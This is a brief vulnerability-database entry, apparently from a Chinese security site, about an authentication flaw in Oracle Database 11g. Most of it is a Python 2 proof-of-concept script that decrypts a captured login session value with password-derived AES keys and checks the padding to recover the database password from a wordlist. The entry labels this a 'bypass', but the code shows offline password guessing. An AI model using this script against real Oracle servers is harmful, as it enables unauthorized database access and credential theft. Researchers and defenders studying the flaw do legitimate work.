Latest Oracle Database authentication protocol security bypass vulnerability

2012-10-29T00:00:00
ID MYHACK58:62201235351
Type myhack58
Reporter Anonymous
Modified 2012-10-29T00:00:00

Description

Oracle Database has been found to contain a remote security bypass vulnerability that affects its own authentication protocol. An attacker can exploit this vulnerability to bypass database authentication and gain unauthorized access to the database.

Affected versions: Oracle Database 11g Release 1 and 11g Release 2

The published code is as follows:

```python
# -*- coding: utf8 -*-
# Python 2 code; requires PyCrypto (Crypto.Cipher).

import hashlib
from Crypto.Cipher import AES

def decrypt(session, salt, password):
    pass_hash = hashlib.sha1(password + salt)

    # The key is the 20-byte SHA-1 digest padded with zero bytes to 24 bytes
    key = pass_hash.digest() + '\x00\x00\x00\x00'
    decryptor = AES.new(key, AES.MODE_CBC)
    plain = decryptor.decrypt(session)
    return plain

# Encrypted session value, 48 bytes
session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'

# Salt, 10 bytes
salt_hex = 'A7193E546377EC56639E'

passwords = ['test', 'password', 'oracle', 'demo']

for password in passwords:
    session_id = decrypt(session_hex.decode('hex'), salt_hex.decode('hex'), password)
    print 'Decrypted session_id for password "%s" is %s' % (password, session_id.encode('hex'))
    # Valid padding (eight 0x08 bytes) after the first 40 bytes means the key was correct
    if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08':
        print 'PASSWORD IS "%s"' % password
        break
```